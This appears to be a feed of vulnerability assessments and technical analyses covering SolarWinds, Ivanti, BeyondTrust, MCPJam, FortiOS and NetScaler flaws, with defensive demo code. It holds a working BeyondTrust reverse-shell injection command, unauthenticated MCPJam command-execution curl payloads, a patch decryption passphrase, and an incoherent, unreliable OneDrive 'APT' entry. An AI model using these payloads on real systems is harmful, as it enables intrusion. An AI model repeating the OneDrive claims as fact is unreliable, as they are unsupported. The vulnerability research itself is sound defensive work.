Activity Feed

1
Ratings
Technical Analysis

CVE-2025-40551 is one of four critical vulnerabilities affecting SolarWinds Web Help Desk that were patched on January 28, 2026. The vulnerability, which was reported to SolarWinds by Jimi Sebree of Horizon3.ai, is an unsafe deserialization bug, and it facilitates unauthenticated remote code execution on affected Web Help Desk systems. The issue is a patch bypass for CVE-2024-28986, a deserialization flaw in the AjaxProxy component that had already had two prior patch bypasses. This vulnerability, along with the prior patch bypasses, has been added to the CISA KEV catalog.

CVE-2025-40551 is exploited by using a different URI path than previous exploits did, bypassing sanitization measures. That, along with the inclusion of some whitelisted terms, sidesteps defensive checks that had previously been implemented to prevent exploitation. The Horizon3.ai writeup published by the original finders demonstrated a simple JNDI lookup gadget, but weaponized exploits for Web Help Desk on Windows and Linux are now available.

I’ve rated ‘Attacker Value’ as ‘Very High’, since the software is popular, it sees exploitation in the wild, and help desk software tends to contain a lot of sensitive information. I’ve rated ‘Exploitability’ as ‘Very High’, since the bug class is a reliable one and weaponized gadget chains are available.

1
Ratings
Technical Analysis

CVE-2026-1340 and CVE-2026-1281 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.

The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.

Technical Analysis

Overview

On February 6, 2026, BeyondTrust published an advisory for a new critical command injection vulnerability, CVE-2026-1731, affecting their products Remote Support (RS) and Privileged Remote Access (PRA).

Rapid7 Labs has reproduced this new vulnerability. Notably, it is in the exact same endpoint as a previous high-profile vulnerability, CVE-2024-12356. While CVE-2024-12356 was exploited in the wild as a zero-day, this new vulnerability was reported to the vendor through coordinated disclosure, and there is no known exploitation in the wild at this time. The technical similarity between the two issues highlights how critical this new vulnerability is in terms of exploitability, and how valuable a solution like RS or PRA is as a target to an attacker.

The following technical analysis details CVE-2026-1731. Our prior analysis of CVE-2024-12356 is recommended reading to better understand the target architecture and how to communicate to the affected endpoint.

Analysis

We begin by extracting the patch for CVE-2026-1731 – a file called BT26-02-RS.nss. We know from our prior analysis of CVE-2024-12356 that these patches are encrypted with a static key. Decrypting and extracting the contents of the patch reveals a number of interesting files; ./pre_scripts/bt26-02.sh, ./resources/thinA, ./resources/thinB, and ./resources/thinD.

sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ openssl enc -d -in BT26-02-RS.nss  -md sha1 -pass pass:"Bingb0ng, what she said; the Tw1st3d switch is RED" -aes-256-cbc > ./BT26-02-RS.tar 2>/dev/null
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ tar -xvf BT26-02-RS.tar 
cert_chain.pem
content
signature
signature.sha256
sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ cat content | gunzip - | tar -xv
install
application_patch.conf
ingredi_patch.conf
pre_scripts/
pre_scripts/bt26-02.sh
resources/
resources/thinA
resources/thinB
resources/thinD
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al
total 80
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:52 ..
-rw-r--r-- 1 sfewer sfewer   361 Feb  4 06:00 application_patch.conf
-rw------- 1 sfewer sfewer 11104 Feb 10 08:30 BT26-02-RS.nss
-rw-rw-r-- 1 sfewer sfewer 11081 Feb 10 12:53 BT26-02-RS.tar
-rw-r--r-- 1 sfewer sfewer  1846 Feb  4 06:00 cert_chain.pem
-rw-r--r-- 1 sfewer sfewer  8099 Feb  4 06:00 content
-rw-r--r-- 1 sfewer sfewer    45 Feb  4 06:00 ingredi_patch.conf
-rwxr--r-- 1 sfewer sfewer  7366 Feb  4 06:00 install
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 pre_scripts
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 resources
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature
-rw-r--r-- 1 sfewer sfewer   512 Feb  4 06:00 signature.sha256
-rw-r--r-- 1 sfewer sfewer     2 Feb  4 06:00 sne.version
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al ./resources/
total 44
drwxr-xr-x 2 sfewer sfewer  4096 Feb  4 06:00 .
drwxrwxr-x 4 sfewer sfewer  4096 Feb 10 12:53 ..
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinA
-rw-r--r-- 1 sfewer sfewer 10619 Feb  4 06:00 thinB
-rw-r--r-- 1 sfewer sfewer 10570 Feb  4 06:00 thinD

Examining the bt26-02.sh shell script we can see that this script will patch the destination file $BG_app_root/app/thin-scc-wrapper with one of the three “thin” resource files – depending on the current version of the product. As our test system is running version 24.1.2 we will explore the file ./resources/thinB. We can note that the destination thin-scc-wrapper script is where CVE-2024-12356 was located, and is reachable by an unauthenticated attacker via a WebSocket connection.

#!/bin/bash

# grab a few vars from the database
BUILD_COMMIT_NUM=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_num'")
BUILD_COMMIT_HASH=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_hash'")
BUILD_DATE=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_date'")

# sedcp,  lifted pretty much directly from mkar with only the vars we care about
function sedcp # <srcfile> <destfile>
{
    src=$1
    shift 1

    dest=$1
    shift 1

    SED_EXPRS="
		s^%COMPANY%^$BG_company^g;
		s^%PRODUCT%^$BG_product^g;
		s^%VERSION%^$BG_version^g;
		s^%BUILD_VERSION%^$BG_version^g;
		s^%BUILD_COMMIT_NUM%^$BUILD_COMMIT_NUM^g;
		s^%BUILD_COMMIT_HASH%^$BUILD_COMMIT_HASH^g;
		s^%BUILD_DATE%^$BUILD_DATE^g;
    "

    sed -e "$SED_EXPRS" "$src" >"$dest"
}

function compare_versions #     a.b.c[suffix]   x.y.z[suffix]  (the first one may be "UNKNOWN")
{
        # this function compares the version string in $1 to the version string in $2 and returns
        #  <0 if $1<$2
        # ==0 if $1==$2
        #  >0 if $1>$2

        if [[ -z "$1"  || "$1" == "UNKNOWN" ]]; then
                # "" or UNKNOWN is less than anything on the right
                echo -1
                return
        fi

        if [[ "$1" == "$2" ]]; then
                echo 0
                return
        fi

        # the complex sed is to retain only the numeric version and strip off any given suffix from the version string
        v1=$(echo "$1" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
        v2=$(echo "$2" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/')
        ver1=$(printf "%d%03d%03d" $(echo "$v1" | cut -f1 -d.) $(echo "$v1" | cut -f2 -d.) $(echo "$v1" | cut -f3 -d.) )
        ver2=$(printf "%d%03d%03d" $(echo "$v2" | cut -f1 -d.) $(echo "$v2" | cut -f2 -d.) $(echo "$v2" | cut -f3 -d.) )

        echo $(( $ver1 - $ver2 ))
}

# patch between 25.2.1 and  25.3.1 inclusive
if [[ $(compare_versions $BG_version "25.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.3.1") -le 0 ]]; then
	echo Copying thinA over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinA $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

# patch between 23.2.1 and 25.1.5 inclusive
if [[ $(compare_versions $BG_version "23.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.1.5") -le 0 ]]; then
	echo Copying thinB over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinB $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

# patch between 21.3.1 and 22.3.4 inclusive
if [[ $(compare_versions $BG_version "21.3.1") -ge 0 ]] && [[ $(compare_versions $BG_version "22.3.4") -le 0 ]]; then
	echo Copying thinD over $BG_app_root/app/thin-scc-wrapper
	sedcp resources/thinD $BG_app_root/app/thin-scc-wrapper
	
	exit 0
fi

Diffing thinB against thin-scc-wrapper shows that a sanity check has been added to the attacker-controlled input for the remote version number. The new check ensures the version number is actually a number and contains only numerical characters (one or two digits). With this in mind, we now need to explore how this input could lead to command injection.

@@ -48,6 +48,12 @@ blog "reading remoteVersion"
 read -t 30 remoteVersion || exit 1
 blog "read remoteVersion as [$remoteVersion]"
 
+# Validate remote version is a number (single or two-digit)
+if [[ ! "$remoteVersion" =~ ^[0-9]{1,2}$ ]]; then
+    blog "ERROR: Invalid remote version - must be a 1-2 digit number"
+    exit 1
+fi
+  
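Review bot: the new check sits after `blog "read remoteVersion as [$remoteVersion]"`, so the raw, not-yet-validated attacker value is still written to the log before it is rejected; moving the regex check above that blog line, or logging the value only after it passes, keeps unvalidated input out of the log. The check itself closes the injection as written: `[[ ! "$remoteVersion" =~ ^[0-9]{1,2}$ ]]` leaves the pattern unquoted, which is what bash needs to treat it as an ERE, and anything other than one or two ASCII digits now exits before the `-lt` and `-gt` comparisons further down can evaluate it arithmetically.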

The thin-scc-wrapper script reads and processes the remoteVersion variable as follows:

# read their version number
read -t 30 remoteVersion || exit 1
blog "read remoteVersion as [$remoteVersion]"

# Assuming that the thin clients will be the more knowledgable of
# speaking older protocol versions.  They can look at the server version
# and adjust to match easier than the trymax side.
version=""
if [[ "$localVersion" -lt "$remoteVersion" ]]; then
	version=$localVersion
else
	version=$remoteVersion
fi

# now we both agree on the protocol version

# =================================================================================================
# =================================================================================================
# =================================================================================================

if [[ $version -gt "$localVersion" ]]; then
	blog "unhandled protocol version [$version]"
	exit 1
fi

The command injection is present here but it is not immediately obvious unless you are very familiar with the nuances of Bash arithmetic evaluation. To assist us, we ask Gemini. The following Gemini response explains the problem very clearly:

Yes, there is a potential command injection (or more accurately, arbitrary code execution) vulnerability in this script.

While it looks like a simple numeric comparison, the way Bash handles the [[ ... ]] construct with the -lt (less than) and -gt (greater than) operators involves Arithmetic Evaluation.

The Vulnerability: Arithmetic Evaluation
In Bash, when using arithmetic operators like -lt, -gt, or -eq inside [[ ]], the shell treats the operands as expressions. If an attacker can control the value of remoteVersion, they can pass a string that Bash will evaluate as code.

How an attacker would exploit it:
If an attacker provides a payload like:
remoteVersion='a[$(touch /tmp/pwned)]0'

When the script reaches this line:
if [[ "$localVersion" -lt "$remoteVersion" ]]; then

Bash evaluates remoteVersion. Because it sees the structure of an array index or an expression, it executes the command inside the subshell $(...) to determine the value.

Interestingly, a recent analysis by watchTowr for a different vulnerability in a different product (CVE-2026-1281 in Ivanti EPMM), published January 30, 2026, also shows a similar root cause due to arithmetic evaluation. We can note that the original finders of CVE-2026-1731, Hacktron, are using “AI-enabled variant analysis” for vulnerability discovery, so the recent work in this area may have helped their discovery, as they cite a date of January 31, 2026 as the discovery date – one day after the watchTowr analysis of CVE-2026-1281.

We now know that we can execute an arbitrary OS command by supplying a malicious version number as part of a WebSocket request, whereby the malicious version number will be in the form a[$(touch /tmp/pwned)].
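To make the root cause concrete, the following is an added example, not code from the Rapid7 write-up or from the BeyondTrust product: it runs the exact `[[ "$localVersion" -lt "$remoteVersion" ]]` comparison under bash with an injected array-subscript value, using a marker file in place of the reverse shell, and then applies the one-or-two-digit validation that the BT26-02 patch introduces ahead of the comparison. The `hax[...]` payload shape follows the PoC in this analysis; the marker file path and the function names are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not code from the Rapid7 write-up or from BeyondTrust:
# isolates the CVE-2026-1731 root cause. vuln_compare runs the exact
# comparison from thin-scc-wrapper under bash; valid_remote_version is the
# 1-2 digit check the BT26-02 patch adds, and safe_compare applies it first.
# A marker file stands in for the reverse shell; its path is an assumption.

# Vulnerable: inside [[ ]], the operands of -lt are evaluated as arithmetic.
# A value shaped like an array reference, name[subscript], has its subscript
# expanded, so any $( ... ) in it runs. Prints "lt" or "ge"; the side effect
# of the expansion is the real result. stderr is silenced and a failing exit
# is swallowed because bash rejects the expression as malformed only after
# the command substitution has already executed.
vuln_compare() {
  bash -c '
    localVersion=$1; remoteVersion=$2
    if [[ "$localVersion" -lt "$remoteVersion" ]]; then echo lt; else echo ge; fi
  ' _ "$1" "$2" 2>/dev/null || true
}

# Patched input check, written portably: exactly one or two ASCII digits,
# equivalent to  [[ "$remoteVersion" =~ ^[0-9]{1,2}$ ]]  in the BT26-02 patch.
valid_remote_version() {
  case "$1" in
    [0-9]|[0-9][0-9]) return 0 ;;
    *) return 1 ;;
  esac
}

# Hardened: reject anything that is not a plain version number before the
# arithmetic comparison is ever reached.
safe_compare() {
  valid_remote_version "$2" || return 1
  vuln_compare "$1" "$2"
}

# Demonstration: same hax[$( ... )] shape as the PoC above, with touch in
# place of the reverse shell.
marker="${TMPDIR:-/tmp}/cve-2026-1731-demo.$$"
payload="hax[\$(touch $marker)]"

rm -f "$marker"
vuln_compare 3 "$payload" >/dev/null
if [ -f "$marker" ]; then
  echo "vulnerable comparison: marker file created, the injected command ran"
fi

rm -f "$marker"
if safe_compare 3 "$payload" >/dev/null; then
  echo "unexpected: hardened comparison accepted the payload"
else
  echo "hardened comparison: payload rejected before evaluation"
fi
[ -f "$marker" ] || echo "hardened comparison: no marker file, nothing ran"
rm -f "$marker"
```

The same shape applies to the `-gt` check later in the script; once the value passes `valid_remote_version`, both comparisons only ever see digits.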

We can construct a PoC for CVE-2026-1731 by modifying the PoC from our prior analysis. We need to connect to the WebSocket URI /nw. The remote service, i.e. the thin-scc-wrapper script, expects us to transmit a newline delimited sequence comprising a version number, a UUID for the “thin mint” cookie value, an authentication type, and a “gskey” value.

As we want to place our command injection in the version number, we construct our PoC as follows, with a bash reverse shell as the payload. The header value X-Ns-Company must be set to the target appliance’s company name (We have previously shown in our Metasploit module for CVE-2024-12356 how to programmatically extract the company name).

Note: the below $ is escaped as \$ as we are running this on the command line.

echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/192.168.1.23/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | ./websocat -k wss://192.168.1.105:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: myexamplecompany" --binary -n -

An NCat listener will catch the reverse shell.

Remediation

BeyondTrust has released patches to remediate CVE-2026-1731 for the following versions:

  • Privileged Remote Access (PRA) version 24.3.4 and earlier
    • Patch BT26-02-PRA
  • Remote Support (RS) version 25.3.1 and earlier
    • Patch BT26-02-RS

BeyondTrust customers are urged to apply this patch on an urgent basis.


1
Ratings
Technical Analysis

On February 6, 2026, BeyondTrust released security advisory BT26-02, disclosing a critical remote code execution vulnerability affecting its Remote Support (RS) and Privileged Remote Access (PRA) products. Reported by Hacktron AI researchers and assigned CVE-2026-1731, exploitation allows unauthenticated, remote attackers to execute arbitrary operating system commands in the context of the site user by sending specially crafted requests. The vulnerability affects Remote Support (RS) versions 25.3.1 and prior, as well as Privileged Remote Access (PRA) versions 24.3.4 and prior.

While BeyondTrust automatically patched SaaS instances on February 2, 2026, self-hosted customers remain at risk until manual updates are applied. BeyondTrust has not reported active exploitation of CVE-2026-1731 in the wild, as of Feb 9, 2026, but the platform’s immense footprint makes it a high-priority target for sophisticated adversaries. BeyondTrust provides identity security services to more than 20,000 customers across over 100 countries, including 75% of the Fortune 100. Furthermore, past vulnerabilities in BeyondTrust software were leveraged by nation state attackers to breach the US Treasury in late 2024, triggering emergency directives by CISA.

Based on the stated impact of the vulnerability, the wide use of the affected software, and the sensitivity of the environments that the software is known to be deployed in, I’ve rated ‘Attacker Value’ as ‘Very High’. I’ve chosen to rate ‘Exploitability’ as ‘Very High’, since the vulnerability is an easily exploitable variant on a previous significantly impactful vulnerability in BeyondTrust software.

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

Summary

Out of the box, MCPJam runs with auth disabled and on 0.0.0.0, and local auth is not available; it has to be configured to auth to MCPJam’s servers (https://login.mcpjam.com/).

The patch only changes the default listener to run only on localhost, not on 0.0.0.0, meaning that if the user chooses to make it available on all interfaces, it will still be vulnerable.

When optional auth is added, in testing on the latest version the RCE is still achievable without authenticating. Auth appears to be for cloud sync of secrets only, not for protecting access to the tool or its endpoints.

RCE Endpoints

The endpoint that allows for RCE, /api/mcp/connect, does so by design. This endpoint is supposed to run commands, typically using npx or Python, to start local MCP bridges or interfaces, so this exploit is just abusing an existing feature while bypassing auth.

Exploitation

Exploiting is pretty simple, as it’s not authenticated, you can just browse to the site and use the web UI. This also means burp, curl, and Python scripts could all trivially create payloads.

Example Payloads

For Nix / Docker

curl http://<TARGET_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data '
{
  "serverConfig": {
    "timeout": 10000,
    "command": "bash",
    "args": [
      "-c",
      "echo pwned > /tmp/pwned"
    ],
    "env": {}
  },
  "serverId": "RandomServer"
}'

For Windows

curl http://<TARGET_IP>:6274/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data '
{
  "serverConfig": {
    "timeout": 10000,
    "command": "cmd.exe",
    "args": [
      "/c",
      "calc"
    ],
    "env": {}
  },
  "serverId": "RandomServer"
}'

Secrets

LLM API keys and EnvVars for the MCP servers would be the highest impact here, but these are not actually stored to disk; they are written to the browser’s local storage, meaning that any exploit attempt would have to pivot to exploiting the user’s browser session through something like XSS in order to retrieve those values.

Post Exploitation

Depending on how the MCPJam server is deployed, that may be easier or harder. If it’s deployed via Docker, then the attacker would have to edit the running application, which would not have persistence across reboots.

If the MCPJam server is deployed on the host directly using npx as per the installation guide, then RCE results in full access as the user to the host operating system, which opens up a lot more avenues for post-exploitation.

1
Ratings
Technical Analysis

This vulnerability allows scripting commands to load from SharePoint servers and OneDrive; when signing into OneDrive, the malicious software loads onto the computer during sync operations and lands as a vault executable. This vulnerability allows modification of files and photos and is the attack entry point for creating a shadow account, which then allows authorization for multiple sign-ins and unauthorized access to bookmarks, history and credentials. They create scripts and save their commands and scripts inside of SharePoint and use Graph connections to control AI services, which they can’t control remotely, altering chat behavior and exfiltrating data from the AI services. These shadow accounts tie to malicious fake login pages where they use fake icon packs for icon smuggling, and they use these packs on the computer to replace legitimate applications to trick the user into clicking, which sends the user to the fake website where they continue to steal more resources and credentials. These APT threat actors use this to create profiles of their intended targets and to maintain persistent access with every device and network they get access to. They replace the files with executable content or delete and steal data. I have seen them use Cortana and the executable help.exe to use Feedback Hub, and for fake setup during the reinstall feature. They use OneDrive to perform most of their operations, especially using the sync feature to load their malicious code. These threat actors are the most sophisticated coders there are; it’s taken years of work to get them removed, uncovering every layer that they have covered. They use the vault in OneDrive to steal the data, then replace it with a RAT Trojan to execute when the user opens the vault.

2
Ratings
Technical Analysis

CVE-2024-55591 is a critical severity authentication bypass affecting FortiOS and FortiProxy, facilitating full administrator-level control of the device with no existing level of access. The vulnerability’s official advisory was published on January 14, 2025. At the time of publication, the vulnerability was being exploited in the wild, per a zero-day exploitation report by Arctic Wolf. Subsequently, security firm watchTowr published an excellent technical analysis of the vulnerability, which outlines the details of exploitation.

The vulnerability is a complex one, encompassing a WebSocket access control issue, an internal parameter that can be provided to skip a stage of session checks, and a race condition in the Telnet interface. The result is reliable command-line interface access as the administrator via exploitation of the web service on a very widely deployed target that’s typically publicly exposed. I’ve rated ‘Attacker Value’ as ‘Very High’, for the aforementioned reasons. I’ve rated ‘Exploitability’ as ‘Very High’, since the exploit works quickly and reliably against the web service and results in full compromise of the target system.

2
Ratings
Technical Analysis

This vulnerability was also discovered by Rapid7 during analysis of the NetScaler Console platform. Initially, Citrix indicated the issue was already fixed in their latest version and declined to assign a CVE. However, after further investigation in June 2025, the vendor determined that the vulnerability is tracked as CVE-2024-12284. It affects NetScaler Console and NetScaler Agent versions 14.1 before 14.1-38.53 and 13.1 before 13.1-56.18.

The vulnerability is a classic ZipSlip attack targeting the StyleBook import functionality. The StyleBook API, a Python microservice, allows administrators to import configuration bundles as ZIP or TAR archives via the /stylebook/nitro/v2/config/stylebooks/actions/import endpoint. When processing tar-gzipped files, the code calls tarfile.extractall() without validating member paths for directory traversal sequences. Malicious archives containing filenames with path traversal patterns (e.g., ../../../../../../../var/cron/tabs/root) are extracted directly to the filesystem. Since the extraction process runs as user ID 1000 with root-equivalent privileges, files can be written to any arbitrary location on the system, including protected directories.

This vulnerability enables authenticated attackers to achieve remote code execution as root by writing malicious files to privileged locations. The demonstrated proof-of-concept writes a cron job containing a reverse shell payload to /var/cron/tabs/root, which executes automatically and grants root shell access. When chained with CVE-2024-6235 (authentication bypass), attackers achieve unauthenticated remote code execution with full system control.

A full analysis can be found here: https://www.rapid7.com/blog/post/cve-2025-4365-cve-unassigned-netscaler-console-sdx-authenticated-arbitrary-file-read-write-fixed/
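An added example for the extraction flaw described in this assessment, not Rapid7’s proof-of-concept and not NetScaler’s StyleBook code: it builds a constructed tar.gz in memory whose member name carries a `../` sequence, shows `tarfile.extractall()` writing that member outside the destination, and contrasts it with extraction that checks every member’s resolved path and type before anything is written. It runs inside a temporary directory, so the escaped file lands in a sibling directory rather than in `/var/cron/tabs/root`; all directory names, the function names and the crontab line are assumptions for the demo.

```python
"""Added example for the ZipSlip described above; not Rapid7's or Citrix's code.
Builds a constructed tar.gz whose member name carries a ../ traversal sequence,
then contrasts the StyleBook-style tarfile.extractall() call with extraction
that validates every member against the destination first. Directory names
and the payload are demo assumptions."""
import io
import os
import tarfile
import tempfile

# Member name shape from the write-up; the demo uses a shorter one so the
# escaped file lands inside a temporary directory rather than in /var.
REAL_WORLD_NAME = "../../../../../../../var/cron/tabs/root"


def build_malicious_archive(member_name: str, payload: bytes) -> bytes:
    """Constructed input: a gzipped tar with one regular-file member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def is_safe_path(base_dir: str, name: str) -> bool:
    """True only if base_dir/name resolves to a location inside base_dir.
    Rejects absolute names (os.path.join discards base_dir for them) and
    names whose ../ components climb out of base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    return os.path.commonpath([base, target]) == base


def is_safe_member(base_dir: str, member: tarfile.TarInfo) -> bool:
    """Path check plus member-type check: symlink and hard-link members can
    redirect a later member's write outside base_dir, and device nodes never
    belong in an uploaded bundle."""
    if member.issym() or member.islnk() or member.isdev():
        return False
    return is_safe_path(base_dir, member.name)


def _extractall_unfiltered(tar: tarfile.TarFile, dest: str) -> None:
    """extractall() with the stdlib's path sanitisation off. Python 3.12+
    warns without a filter and 3.14 defaults to the 'data' filter, so the
    legacy behaviour is requested explicitly where the keyword exists."""
    try:
        tar.extractall(dest, filter="fully_trusted")
    except TypeError:  # older Python without the filter= keyword
        tar.extractall(dest)


def extract_vulnerable(archive: bytes, dest: str) -> list[str]:
    """The vulnerable pattern: extract every member without looking at its
    name. Returns the resolved paths that were written."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        names = [m.name for m in tar.getmembers()]
        _extractall_unfiltered(tar, dest)
    return [os.path.realpath(os.path.join(dest, n)) for n in names]


def extract_safe(archive: bytes, dest: str) -> list[str]:
    """The fix: validate all members, reject the whole bundle on any bad
    one, and only then extract."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        members = tar.getmembers()
        bad = [m.name for m in members if not is_safe_member(dest, m)]
        if bad:
            raise ValueError(f"refusing archive with unsafe member paths: {bad}")
        _extractall_unfiltered(tar, dest)
    return [os.path.realpath(os.path.join(dest, m.name)) for m in members]


def demo() -> dict:
    """Runs both extractors in a throwaway tree root/a/b/c and reports where
    the traversal member ended up."""
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "a", "b", "c")
        os.makedirs(dest)
        crontab_line = b"* * * * * /bin/sh -c 'id > /tmp/pwned'\n"  # constructed payload
        archive = build_malicious_archive("../../../outside/owned.txt", crontab_line)

        written = extract_vulnerable(archive, dest)
        real_dest = os.path.realpath(dest)
        escaped = os.path.commonpath([real_dest, written[0]]) != real_dest
        landed = os.path.join(os.path.realpath(root), "outside", "owned.txt")

        try:
            extract_safe(archive, dest)
            blocked = False
        except ValueError:
            blocked = True

        return {
            "written_outside_dest": escaped,
            "file_exists_at_root": os.path.isfile(landed),
            "safe_extractor_refused": blocked,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On Python 3.12 and later, `extractall(path, filter="data")` performs a comparable rejection of absolute and traversing names; the explicit check above is what a service that must run on older interpreters, or that wants to refuse the whole bundle rather than skip members, needs.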